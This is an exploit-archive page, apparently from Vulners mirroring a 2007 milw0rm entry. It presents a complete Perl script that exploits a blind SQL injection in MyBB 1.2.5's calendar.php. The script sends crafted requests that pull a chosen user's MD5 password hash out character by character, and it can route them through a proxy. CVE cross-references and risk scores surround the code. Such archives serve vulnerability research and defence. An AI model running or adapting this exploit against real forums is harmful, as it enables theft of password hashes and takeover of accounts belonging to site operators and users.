Lucene search
+L

MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection

🗓️ 23 Apr 2007 00:00:00Reported by 0x86Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

MyBulletinBoard 1.2.5 'calendar.php' SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-2211
24 Apr 200720:00
cve
cve
CVE
CVE-2007-2212
24 Apr 200720:00
cve
cvelist
Cvelist
CVE-2007-2211
24 Apr 200720:00
cvelist
cvelist
Cvelist
CVE-2007-2212
24 Apr 200720:00
cvelist
euvd
EUVD
EUVD-2007-2206
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2007-2207
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2211
24 Apr 200720:19
nvd
nvd
NVD
CVE-2007-2212
24 Apr 200720:19
nvd
prion
Prion
Sql injection
24 Apr 200720:19
prion
prion
Prion
Sql injection
24 Apr 200720:19
prion
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #############################################################\n";
  print "   #   MyBulletinBoard <= 1.2.5 Remote SQL Injection Exploit   #\n";
  print "   #   Bug found and Exploit coded by 0x86                     #\n";
  print "   #                                                           #\n";
  print "   #   www.geeksec.net                                         #\n";
  print "   #   0x86 [at] geeksec.net                                   #\n";
  print "   #                                                           #\n";
  print "   #   Usage:   perl mybb.pl host path <options>               #\n";
  print "   #   Example: perl mybb.pl www.host.com /mybb/ -u 5          #\n";
  print "   #                                                           #\n";
  print "   #   Options:                                                #\n";
  print "   #     -u    User-ID, default: 1                             #\n";
  print "   #     -p    Proxy support                                   #\n";
  print "   #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my %options = ();
GetOptions(\%options, "u=i", "p=s");

print "[+] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

syswrite(STDOUT, "[+] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[+] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $i     = shift;
  my $h     = shift;

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."calendar.php?action=dayview&year=2007&month=3&day=1111111'%20OR%20SUBSTRING((SELECT%20password%20FROM%20mybb_users%20WHERE%20uid=".$uid."),".$i.",1)=CHAR(".$h.")/*";

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "profile";

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2007-04-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01061
37